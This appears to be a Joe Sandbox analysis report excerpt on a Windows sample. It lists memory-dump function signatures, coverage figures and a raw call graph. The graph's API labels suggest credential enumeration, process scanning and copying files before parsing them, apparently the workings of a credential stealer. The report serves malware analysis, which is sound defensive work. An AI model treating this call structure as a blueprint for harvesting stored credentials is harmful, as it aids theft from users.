• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
• Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
• Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
• Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
• GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
• Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
• Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
• Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: _strlen
• String ID: : $Se.
• API String ID: 4218353326-4089948878
• Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
• Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
• Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
• Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
  • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
• __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
Strings
Memory Dump Source
• Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_10000000_graias.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
• Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
• Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
• Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690

Execution Graph

Execution Coverage: 6.2%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 0.8%
Total number of Nodes: 2000
Total number of Limit Nodes: 61
execution_graph: rendered call-graph data (node IDs, edges and API call labels spilled from the interactive graph view); the graph is not reproducible as text here and only the coverage figures above are retained.
4099fb malloc 38481->38483 38482->38386 38485 409a37 38483->38485 38486 409a1c 38483->38486 38485->38386 38487 409a30 free 38486->38487 38488 409a20 memcpy 38486->38488 38487->38485 38488->38487 38490 40a9e7 38489->38490 38491 40a9dc free 38489->38491 38493 4099f4 3 API calls 38490->38493 38492 40a9f2 38491->38492 38492->38396 38493->38492 38518 409bca GetModuleFileNameW 38494->38518 38496 40dce6 wcsrchr 38497 40dcf5 38496->38497 38498 40dcf9 wcscat 38496->38498 38497->38498 38498->38404 38519 44db70 38499->38519 38503 40dbfd 38522 4447d9 38503->38522 38506 40dc34 wcscpy wcscpy 38548 40d6f5 38506->38548 38507 40dc1f wcscpy 38507->38506 38510 40d6f5 3 API calls 38511 40dc73 38510->38511 38512 40d6f5 3 API calls 38511->38512 38513 40dc89 38512->38513 38514 40d6f5 3 API calls 38513->38514 38515 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38514->38515 38554 40da80 38515->38554 38518->38496 38520 40dbb4 memset memset 38519->38520 38521 409bca GetModuleFileNameW 38520->38521 38521->38503 38524 4447f4 38522->38524 38523 40dc1b 38523->38506 38523->38507 38524->38523 38525 444807 ??2@YAPAXI 38524->38525 38526 44481f 38525->38526 38527 444873 _snwprintf 38526->38527 38528 4448ab wcscpy 38526->38528 38561 44474a 8 API calls 38527->38561 38530 4448bb 38528->38530 38562 44474a 8 API calls 38530->38562 38532 4448a7 38532->38528 38532->38530 38533 4448cd 38563 44474a 8 API calls 38533->38563 38535 4448e2 38564 44474a 8 API calls 38535->38564 38537 4448f7 38565 44474a 8 API calls 38537->38565 38539 44490c 38566 44474a 8 API calls 38539->38566 38541 444921 38567 44474a 8 API calls 38541->38567 38543 444936 38568 44474a 8 API calls 38543->38568 38545 44494b 38569 44474a 8 API calls 38545->38569 38547 444960 ??3@YAXPAX 38547->38523 38549 44db70 38548->38549 38550 40d702 memset GetPrivateProfileStringW 38549->38550 38551 40d752 38550->38551 38552 40d75c WritePrivateProfileStringW 38550->38552 38551->38552 38553 40d758 38551->38553 38552->38553 38553->38510 38555 44db70 
38554->38555 38556 40da8d memset 38555->38556 38557 40daac LoadStringW 38556->38557 38558 40dac6 38557->38558 38558->38557 38560 40dade 38558->38560 38570 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38558->38570 38560->38333 38561->38532 38562->38533 38563->38535 38564->38537 38565->38539 38566->38541 38567->38543 38568->38545 38569->38547 38570->38558 38581 409b98 GetFileAttributesW 38571->38581 38573 40daea 38574 40db63 38573->38574 38575 40daef wcscpy wcscpy GetPrivateProfileIntW 38573->38575 38574->38335 38582 40d65d GetPrivateProfileStringW 38575->38582 38577 40db3e 38583 40d65d GetPrivateProfileStringW 38577->38583 38579 40db4f 38584 40d65d GetPrivateProfileStringW 38579->38584 38581->38573 38582->38577 38583->38579 38584->38574 38620 40eaff 38585->38620 38589 411ae2 memset 38588->38589 38590 411b8f 38588->38590 38660 409bca GetModuleFileNameW 38589->38660 38602 411a8b 38590->38602 38592 411b0a wcsrchr 38593 411b22 wcscat 38592->38593 38594 411b1f 38592->38594 38661 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38593->38661 38594->38593 38596 411b67 38662 402afb 38596->38662 38600 411b7f 38718 40ea13 SendMessageW memset SendMessageW 38600->38718 38603 402afb 27 API calls 38602->38603 38604 411ac0 38603->38604 38605 4110dc 38604->38605 38606 41113e 38605->38606 38611 4110f0 38605->38611 38743 40969c LoadCursorW SetCursor 38606->38743 38608 411143 38744 4032b4 38608->38744 38762 444a54 38608->38762 38609 4110f7 _wcsicmp 38609->38611 38610 411157 38612 40ada2 _wcsicmp 38610->38612 38611->38606 38611->38609 38765 410c46 10 API calls 38611->38765 38615 411167 38612->38615 38613 4111af 38615->38613 38616 4111a6 qsort 38615->38616 38616->38613 38619->38416 38621 40eb10 38620->38621 38633 40e8e0 38621->38633 38624 40eb6c memcpy memcpy 38628 40ebb7 38624->38628 38625 40ebf2 ??2@YAPAXI ??2@YAPAXI 38627 40ec2e ??2@YAPAXI 38625->38627 38630 40ec65 38625->38630 38626 40d134 16 API calls 38626->38628 38627->38630 38628->38624 
38628->38625 38628->38626 38630->38630 38643 40ea7f 38630->38643 38632 402f49 38632->38416 38634 40e8f2 38633->38634 38635 40e8eb ??3@YAXPAX 38633->38635 38636 40e900 38634->38636 38637 40e8f9 ??3@YAXPAX 38634->38637 38635->38634 38638 40e911 38636->38638 38639 40e90a ??3@YAXPAX 38636->38639 38637->38636 38640 40e931 ??2@YAPAXI ??2@YAPAXI 38638->38640 38641 40e921 ??3@YAXPAX 38638->38641 38642 40e92a ??3@YAXPAX 38638->38642 38639->38638 38640->38624 38641->38642 38642->38640 38644 40aa04 free 38643->38644 38645 40ea88 38644->38645 38646 40aa04 free 38645->38646 38647 40ea90 38646->38647 38648 40aa04 free 38647->38648 38649 40ea98 38648->38649 38650 40aa04 free 38649->38650 38651 40eaa0 38650->38651 38652 40a9ce 4 API calls 38651->38652 38653 40eab3 38652->38653 38654 40a9ce 4 API calls 38653->38654 38655 40eabd 38654->38655 38656 40a9ce 4 API calls 38655->38656 38657 40eac7 38656->38657 38658 40a9ce 4 API calls 38657->38658 38659 40ead1 38658->38659 38659->38632 38660->38592 38661->38596 38719 40b2cc 38662->38719 38664 402b0a 38665 40b2cc 27 API calls 38664->38665 38666 402b23 38665->38666 38667 40b2cc 27 API calls 38666->38667 38668 402b3a 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 402b54 38669->38670 38671 40b2cc 27 API calls 38670->38671 38672 402b6b 38671->38672 38673 40b2cc 27 API calls 38672->38673 38674 402b82 38673->38674 38675 40b2cc 27 API calls 38674->38675 38676 402b99 38675->38676 38677 40b2cc 27 API calls 38676->38677 38678 402bb0 38677->38678 38679 40b2cc 27 API calls 38678->38679 38680 402bc7 38679->38680 38681 40b2cc 27 API calls 38680->38681 38682 402bde 38681->38682 38683 40b2cc 27 API calls 38682->38683 38684 402bf5 38683->38684 38685 40b2cc 27 API calls 38684->38685 38686 402c0c 38685->38686 38687 40b2cc 27 API calls 38686->38687 38688 402c23 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 402c3a 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 402c51 38691->38692 38693 40b2cc 27 API calls 38692->38693 38694 
402c68 38693->38694 38695 40b2cc 27 API calls 38694->38695 38696 402c7f 38695->38696 38697 40b2cc 27 API calls 38696->38697 38698 402c99 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 402cb3 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402cd5 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402cf0 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402d0b 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 402d26 38707->38708 38709 40b2cc 27 API calls 38708->38709 38710 402d3e 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 402d59 38711->38712 38713 40b2cc 27 API calls 38712->38713 38714 402d78 38713->38714 38715 40b2cc 27 API calls 38714->38715 38716 402d93 38715->38716 38717 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38716->38717 38717->38600 38718->38590 38722 40b58d 38719->38722 38721 40b2d1 38721->38664 38723 40b5a4 GetModuleHandleW FindResourceW 38722->38723 38724 40b62e 38722->38724 38725 40b5c2 LoadResource 38723->38725 38727 40b5e7 38723->38727 38724->38721 38726 40b5d0 SizeofResource LockResource 38725->38726 38725->38727 38726->38727 38727->38724 38735 40afcf 38727->38735 38729 40b608 memcpy 38738 40b4d3 memcpy 38729->38738 38731 40b61e 38739 40b3c1 18 API calls 38731->38739 38733 40b626 38740 40b04b 38733->38740 38736 40b04b ??3@YAXPAX 38735->38736 38737 40afd7 ??2@YAPAXI 38736->38737 38737->38729 38738->38731 38739->38733 38741 40b051 ??3@YAXPAX 38740->38741 38742 40b05f 38740->38742 38741->38742 38742->38724 38743->38608 38745 4032c4 38744->38745 38746 40b633 free 38745->38746 38747 403316 38746->38747 38766 44553b 38747->38766 38751 403480 38964 40368c 15 API calls 38751->38964 38753 403489 38754 40b633 free 38753->38754 38755 403495 38754->38755 38755->38610 38756 4033a9 memset memcpy 38757 4033ec wcscmp 38756->38757 38758 40333c 38756->38758 38757->38758 38758->38751 38758->38756 38758->38757 38962 4028e7 11 API calls 38758->38962 38963 40f508 6 API 
calls 38758->38963 38760 403421 _wcsicmp 38760->38758 38763 444a64 FreeLibrary 38762->38763 38764 444a83 38762->38764 38763->38764 38764->38610 38765->38611 38767 445548 38766->38767 38768 445599 38767->38768 38965 40c768 38767->38965 38769 4455a8 memset 38768->38769 38912 4457f2 38768->38912 39048 403988 38769->39048 38776 445854 38777 4458aa 38776->38777 39174 403c9c memset memset memset memset memset 38776->39174 38779 44594a 38777->38779 38780 4458bb memset memset 38777->38780 38778 445672 39059 403fbe memset memset memset memset memset 38778->39059 38782 4459ed 38779->38782 38783 44595e memset memset 38779->38783 38785 414c2e 16 API calls 38780->38785 38788 445a00 memset memset 38782->38788 38789 445b22 38782->38789 38790 414c2e 16 API calls 38783->38790 38784 4455e5 38784->38778 38802 44560f 38784->38802 38791 4458f9 38785->38791 39197 414c2e 38788->39197 38794 445bca 38789->38794 38795 445b38 memset memset memset 38789->38795 38800 44599c 38790->38800 38801 40b2cc 27 API calls 38791->38801 38812 445c8b memset memset 38794->38812 38862 445cf0 38794->38862 38807 445bd4 38795->38807 38808 445b98 38795->38808 38796 445849 39262 40b1ab free free 38796->39262 38811 40b2cc 27 API calls 38800->38811 38813 445909 38801->38813 38804 4087b3 338 API calls 38802->38804 38823 445621 38804->38823 38806 44589f 39263 40b1ab free free 38806->39263 38820 414c2e 16 API calls 38807->38820 38808->38807 38816 445ba2 38808->38816 38825 4459ac 38811->38825 38814 414c2e 16 API calls 38812->38814 38822 409d1f 6 API calls 38813->38822 38826 445cc9 38814->38826 39335 4099c6 wcslen 38816->39335 38817 4456b2 39250 40b1ab free free 38817->39250 38819 40b2cc 27 API calls 38829 445a4f 38819->38829 38831 445be2 38820->38831 38821 403335 38961 4452e5 45 API calls 38821->38961 38834 445919 38822->38834 39248 4454bf 20 API calls 38823->39248 38824 445823 38824->38796 38842 4087b3 338 API calls 38824->38842 38835 409d1f 6 API calls 38825->38835 38836 409d1f 6 API calls 38826->38836 38827 445879 
38827->38806 38846 4087b3 338 API calls 38827->38846 39212 409d1f wcslen wcslen 38829->39212 38840 40b2cc 27 API calls 38831->38840 38832 445d3d 38860 40b2cc 27 API calls 38832->38860 38833 445d88 memset memset memset 38843 414c2e 16 API calls 38833->38843 39264 409b98 GetFileAttributesW 38834->39264 38844 4459bc 38835->38844 38845 445ce1 38836->38845 38837 445bb3 39338 445403 memset 38837->39338 38838 445680 38838->38817 39082 4087b3 memset 38838->39082 38849 445bf3 38840->38849 38842->38824 38852 445dde 38843->38852 39331 409b98 GetFileAttributesW 38844->39331 39355 409b98 GetFileAttributesW 38845->39355 38846->38827 38859 409d1f 6 API calls 38849->38859 38850 445928 38850->38779 39265 40b6ef 38850->39265 38861 40b2cc 27 API calls 38852->38861 38854 4459cb 38854->38782 38871 40b6ef 252 API calls 38854->38871 38858 40b2cc 27 API calls 38864 445a94 38858->38864 38866 445c07 38859->38866 38867 445d54 _wcsicmp 38860->38867 38870 445def 38861->38870 38862->38821 38862->38832 38862->38833 38863 445389 258 API calls 38863->38794 39217 40ae18 38864->39217 38865 44566d 38865->38912 39133 413d4c 38865->39133 38874 445389 258 API calls 38866->38874 38875 445d71 38867->38875 38938 445d67 38867->38938 38869 445665 39249 40b1ab free free 38869->39249 38876 409d1f 6 API calls 38870->38876 38871->38782 38879 445c17 38874->38879 39356 445093 23 API calls 38875->39356 38882 445e03 38876->38882 38878 4456d8 38884 40b2cc 27 API calls 38878->38884 38885 40b2cc 27 API calls 38879->38885 38881 44563c 38881->38869 38887 4087b3 338 API calls 38881->38887 39357 409b98 GetFileAttributesW 38882->39357 38883 40b6ef 252 API calls 38883->38821 38889 4456e2 38884->38889 38890 445c23 38885->38890 38886 445d83 38886->38821 38887->38881 39251 413fa6 _wcsicmp _wcsicmp 38889->39251 38894 409d1f 6 API calls 38890->38894 38892 445e12 38895 445e6b 38892->38895 38899 40b2cc 27 API calls 38892->38899 38897 445c37 38894->38897 39359 445093 23 API calls 38895->39359 38896 4456eb 38902 4456fd memset memset 
memset memset 38896->38902 38903 4457ea 38896->38903 38904 445389 258 API calls 38897->38904 38898 445b17 39332 40aebe 38898->39332 38906 445e33 38899->38906 39252 409c70 wcscpy wcsrchr 38902->39252 39255 413d29 38903->39255 38910 445c47 38904->38910 38911 409d1f 6 API calls 38906->38911 38908 445e7e 38913 445f67 38908->38913 38916 40b2cc 27 API calls 38910->38916 38917 445e47 38911->38917 38912->38776 39151 403e2d memset memset memset memset memset 38912->39151 38918 40b2cc 27 API calls 38913->38918 38914 445ab2 memset 38919 40b2cc 27 API calls 38914->38919 38921 445c53 38916->38921 39358 409b98 GetFileAttributesW 38917->39358 38923 445f73 38918->38923 38924 445aa1 38919->38924 38920 409c70 2 API calls 38925 44577e 38920->38925 38926 409d1f 6 API calls 38921->38926 38928 409d1f 6 API calls 38923->38928 38924->38898 38924->38914 38929 409d1f 6 API calls 38924->38929 39224 40add4 38924->39224 39229 445389 38924->39229 39238 40ae51 38924->39238 38930 409c70 2 API calls 38925->38930 38931 445c67 38926->38931 38927 445e56 38927->38895 38935 445e83 memset 38927->38935 38932 445f87 38928->38932 38929->38924 38933 44578d 38930->38933 38934 445389 258 API calls 38931->38934 39362 409b98 GetFileAttributesW 38932->39362 38933->38903 38940 40b2cc 27 API calls 38933->38940 38934->38794 38939 40b2cc 27 API calls 38935->38939 38938->38821 38938->38883 38941 445eab 38939->38941 38942 4457a8 38940->38942 38943 409d1f 6 API calls 38941->38943 38944 409d1f 6 API calls 38942->38944 38946 445ebf 38943->38946 38945 4457b8 38944->38945 39254 409b98 GetFileAttributesW 38945->39254 38948 40ae18 9 API calls 38946->38948 38952 445ef5 38948->38952 38949 4457c7 38949->38903 38951 4087b3 338 API calls 38949->38951 38950 40ae51 9 API calls 38950->38952 38951->38903 38952->38950 38953 445f5c 38952->38953 38955 40add4 2 API calls 38952->38955 38956 40b2cc 27 API calls 38952->38956 38957 409d1f 6 API calls 38952->38957 38959 445f3a 38952->38959 39360 409b98 GetFileAttributesW 38952->39360 38954 
40aebe FindClose 38953->38954 38954->38913 38955->38952 38956->38952 38957->38952 39361 445093 23 API calls 38959->39361 38961->38758 38962->38760 38963->38758 38964->38753 38966 40c775 38965->38966 39363 40b1ab free free 38966->39363 38968 40c788 39364 40b1ab free free 38968->39364 38970 40c790 39365 40b1ab free free 38970->39365 38972 40c798 38973 40aa04 free 38972->38973 38974 40c7a0 38973->38974 39366 40c274 memset 38974->39366 38979 40a8ab 9 API calls 38980 40c7c3 38979->38980 38981 40a8ab 9 API calls 38980->38981 38982 40c7d0 38981->38982 39395 40c3c3 38982->39395 38986 40c877 38995 40bdb0 38986->38995 38987 40c86c 39437 4053fe 39 API calls 38987->39437 38993 40c7e5 38993->38986 38993->38987 38994 40c634 49 API calls 38993->38994 39420 40a706 38993->39420 38994->38993 39605 404363 38995->39605 38998 40bf5d 39625 40440c 38998->39625 39000 40bdee 39000->38998 39003 40b2cc 27 API calls 39000->39003 39001 40bddf CredEnumerateW 39001->39000 39004 40be02 wcslen 39003->39004 39004->38998 39014 40be1e 39004->39014 39005 40be26 wcsncmp 39005->39014 39008 40be7d memset 39009 40bea7 memcpy 39008->39009 39008->39014 39010 40bf11 wcschr 39009->39010 39009->39014 39010->39014 39011 40b2cc 27 API calls 39012 40bef6 _wcsnicmp 39011->39012 39012->39010 39012->39014 39013 40bf43 LocalFree 39013->39014 39014->38998 39014->39005 39014->39008 39014->39009 39014->39010 39014->39011 39014->39013 39628 40bd5d 28 API calls 39014->39628 39629 404423 39014->39629 39015 4135f7 39642 4135e0 39015->39642 39018 40b2cc 27 API calls 39019 41360d 39018->39019 39049 40399d 39048->39049 39671 403a16 39049->39671 39052 403a12 wcsrchr 39052->38784 39055 4039a3 39056 4039f4 39055->39056 39058 403a09 39055->39058 39682 40a02c CreateFileW 39055->39682 39057 4099c6 2 API calls 39056->39057 39056->39058 39057->39058 39685 40b1ab free free 39058->39685 39060 414c2e 16 API calls 39059->39060 39061 404048 39060->39061 39062 414c2e 16 API calls 39061->39062 39063 404056 39062->39063 39064 409d1f 6 API 
calls 39063->39064 39065 404073 39064->39065 39066 409d1f 6 API calls 39065->39066 39067 40408e 39066->39067 39068 409d1f 6 API calls 39067->39068 39069 4040a6 39068->39069 39070 403af5 20 API calls 39069->39070 39071 4040ba 39070->39071 39072 403af5 20 API calls 39071->39072 39073 4040cb 39072->39073 39712 40414f memset 39073->39712 39075 404140 39726 40b1ab free free 39075->39726 39076 4040ec memset 39080 4040e0 39076->39080 39078 404148 39078->38838 39079 4099c6 2 API calls 39079->39080 39080->39075 39080->39076 39080->39079 39081 40a8ab 9 API calls 39080->39081 39081->39080 39739 40a6e6 WideCharToMultiByte 39082->39739 39084 4087ed 39740 4095d9 memset 39084->39740 39134 40b633 free 39133->39134 39135 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39134->39135 39136 413f00 Process32NextW 39135->39136 39137 413da5 OpenProcess 39136->39137 39138 413f17 CloseHandle 39136->39138 39139 413eb0 39137->39139 39140 413df3 memset 39137->39140 39138->38878 39139->39136 39142 413ebf free 39139->39142 39143 4099f4 3 API calls 39139->39143 39978 413f27 39140->39978 39142->39139 39143->39139 39145 413e37 GetModuleHandleW 39147 413e1f 39145->39147 39148 413e46 GetProcAddress 39145->39148 39146 413e6a QueryFullProcessImageNameW 39146->39147 39147->39145 39147->39146 39983 413959 39147->39983 39999 413ca4 39147->39999 39148->39147 39150 413ea2 CloseHandle 39150->39139 39152 414c2e 16 API calls 39151->39152 39153 403eb7 39152->39153 39154 414c2e 16 API calls 39153->39154 39155 403ec5 39154->39155 39156 409d1f 6 API calls 39155->39156 39157 403ee2 39156->39157 39158 409d1f 6 API calls 39157->39158 39159 403efd 39158->39159 39160 409d1f 6 API calls 39159->39160 39161 403f15 39160->39161 39162 403af5 20 API calls 39161->39162 39163 403f29 39162->39163 39164 403af5 20 API calls 39163->39164 39165 403f3a 39164->39165 39166 40414f 33 API calls 39165->39166 39172 403f4f 39166->39172 39167 403faf 40013 40b1ab free free 39167->40013 39169 403f5b memset 39169->39172 39170 403fb7 
39170->38824 39171 4099c6 2 API calls 39171->39172 39172->39167 39172->39169 39172->39171 39173 40a8ab 9 API calls 39172->39173 39173->39172 39175 414c2e 16 API calls 39174->39175 39176 403d26 39175->39176 39177 414c2e 16 API calls 39176->39177 39178 403d34 39177->39178 39179 409d1f 6 API calls 39178->39179 39180 403d51 39179->39180 39181 409d1f 6 API calls 39180->39181 39182 403d6c 39181->39182 39183 409d1f 6 API calls 39182->39183 39184 403d84 39183->39184 39185 403af5 20 API calls 39184->39185 39186 403d98 39185->39186 39187 403af5 20 API calls 39186->39187 39188 403da9 39187->39188 39189 40414f 33 API calls 39188->39189 39195 403dbe 39189->39195 39190 403e1e 40014 40b1ab free free 39190->40014 39191 403dca memset 39191->39195 39193 403e26 39193->38827 39194 4099c6 2 API calls 39194->39195 39195->39190 39195->39191 39195->39194 39196 40a8ab 9 API calls 39195->39196 39196->39195 39198 414b81 9 API calls 39197->39198 39199 414c40 39198->39199 39200 414c73 memset 39199->39200 40015 409cea 39199->40015 39204 414c94 39200->39204 39203 414c64 39203->38819 40018 414592 RegOpenKeyExW 39204->40018 39206 414cc1 39207 414cf4 wcscpy 39206->39207 40019 414bb0 wcscpy 39206->40019 39207->39203 39209 414cd2 40020 4145ac RegQueryValueExW 39209->40020 39211 414ce9 RegCloseKey 39211->39207 39213 409d43 wcscpy 39212->39213 39215 409d62 39212->39215 39214 409719 2 API calls 39213->39214 39216 409d51 wcscat 39214->39216 39215->38858 39216->39215 39218 40aebe FindClose 39217->39218 39219 40ae21 39218->39219 39220 4099c6 2 API calls 39219->39220 39221 40ae35 39220->39221 39222 409d1f 6 API calls 39221->39222 39223 40ae49 39222->39223 39223->38924 39225 40ade0 39224->39225 39226 40ae0f 39224->39226 39225->39226 39227 40ade7 wcscmp 39225->39227 39226->38924 39227->39226 39228 40adfe wcscmp 39227->39228 39228->39226 39230 40ae18 9 API calls 39229->39230 39236 4453c4 39230->39236 39231 40ae51 9 API calls 39231->39236 39232 4453f3 39233 40aebe FindClose 39232->39233 39235 4453fe 
39233->39235 39234 40add4 2 API calls 39234->39236 39235->38924 39236->39231 39236->39232 39236->39234 39237 445403 253 API calls 39236->39237 39237->39236 39239 40ae7b FindNextFileW 39238->39239 39240 40ae5c FindFirstFileW 39238->39240 39241 40ae94 39239->39241 39242 40ae8f 39239->39242 39240->39241 39244 40aeb6 39241->39244 39245 409d1f 6 API calls 39241->39245 39243 40aebe FindClose 39242->39243 39243->39241 39244->38924 39245->39244 39248->38881 39249->38865 39250->38865 39251->38896 39253 409c89 39252->39253 39253->38920 39254->38949 39256 413d39 39255->39256 39257 413d2f FreeLibrary 39255->39257 39258 40b633 free 39256->39258 39257->39256 39259 413d42 39258->39259 39260 40b633 free 39259->39260 39261 413d4a 39260->39261 39261->38912 39262->38776 39263->38777 39264->38850 39266 44db70 39265->39266 39267 40b6fc memset 39266->39267 39268 409c70 2 API calls 39267->39268 39269 40b732 wcsrchr 39268->39269 39270 40b743 39269->39270 39271 40b746 memset 39269->39271 39270->39271 39272 40b2cc 27 API calls 39271->39272 39273 40b76f 39272->39273 39274 409d1f 6 API calls 39273->39274 39275 40b783 39274->39275 40021 409b98 GetFileAttributesW 39275->40021 39277 40b792 39278 409c70 2 API calls 39277->39278 39292 40b7c2 39277->39292 39280 40b7a5 39278->39280 39282 40b2cc 27 API calls 39280->39282 39286 40b7b2 39282->39286 39283 40b837 CloseHandle 39285 40b83e memset 39283->39285 39284 40b817 40055 409a45 GetTempPathW 39284->40055 40058 40a6e6 WideCharToMultiByte 39285->40058 39290 409d1f 6 API calls 39286->39290 39288 40b827 CopyFileW 39288->39285 39290->39292 39291 40b866 39293 444432 121 API calls 39291->39293 40022 40bb98 39292->40022 39294 40b879 39293->39294 39295 40bad5 39294->39295 39296 40b273 27 API calls 39294->39296 39297 40baeb 39295->39297 39298 40bade DeleteFileW 39295->39298 39299 40b89a 39296->39299 39300 40b04b ??3@YAXPAX 39297->39300 39298->39297 39301 438552 134 API calls 39299->39301 39302 40baf3 39300->39302 39303 40b8a4 39301->39303 39302->38779 39304 
40bacd 39303->39304 39306 4251c4 137 API calls 39303->39306 39305 443d90 111 API calls 39304->39305 39305->39295 39329 40b8b8 39306->39329 39307 40bac6 40068 424f26 123 API calls 39307->40068 39308 40b8bd memset 40059 425413 17 API calls 39308->40059 39311 425413 17 API calls 39311->39329 39314 40a71b MultiByteToWideChar 39314->39329 39315 40a734 MultiByteToWideChar 39315->39329 39318 40b9b5 memcmp 39318->39329 39319 4099c6 2 API calls 39319->39329 39320 404423 37 API calls 39320->39329 39323 40bb3e memset memcpy 40069 40a734 MultiByteToWideChar 39323->40069 39324 4251c4 137 API calls 39324->39329 39326 40bb88 LocalFree 39326->39329 39329->39307 39329->39308 39329->39311 39329->39314 39329->39315 39329->39318 39329->39319 39329->39320 39329->39323 39329->39324 39330 40ba5f memcmp 39329->39330 40060 4253ef 16 API calls 39329->40060 40061 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39329->40061 40062 4253af 17 API calls 39329->40062 40063 4253cf 17 API calls 39329->40063 40064 447280 memset 39329->40064 40065 447960 memset memcpy memcpy memcpy 39329->40065 40066 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39329->40066 40067 447920 memcpy memcpy memcpy 39329->40067 39330->39329 39331->38854 39333 40aed1 39332->39333 39334 40aec7 FindClose 39332->39334 39333->38789 39334->39333 39336 4099d7 39335->39336 39337 4099da memcpy 39335->39337 39336->39337 39337->38837 39339 40b2cc 27 API calls 39338->39339 39340 44543f 39339->39340 39341 409d1f 6 API calls 39340->39341 39342 44544f 39341->39342 40161 409b98 GetFileAttributesW 39342->40161 39344 445476 39347 40b2cc 27 API calls 39344->39347 39345 44545e 39345->39344 39346 40b6ef 252 API calls 39345->39346 39346->39344 39348 445482 39347->39348 39349 409d1f 6 API calls 39348->39349 39350 445492 39349->39350 40162 409b98 GetFileAttributesW 39350->40162 39352 4454a1 39353 4454b9 39352->39353 39354 40b6ef 252 API calls 39352->39354 39353->38863 39354->39353 39355->38862 39356->38886 39357->38892 39358->38927 39359->38908 
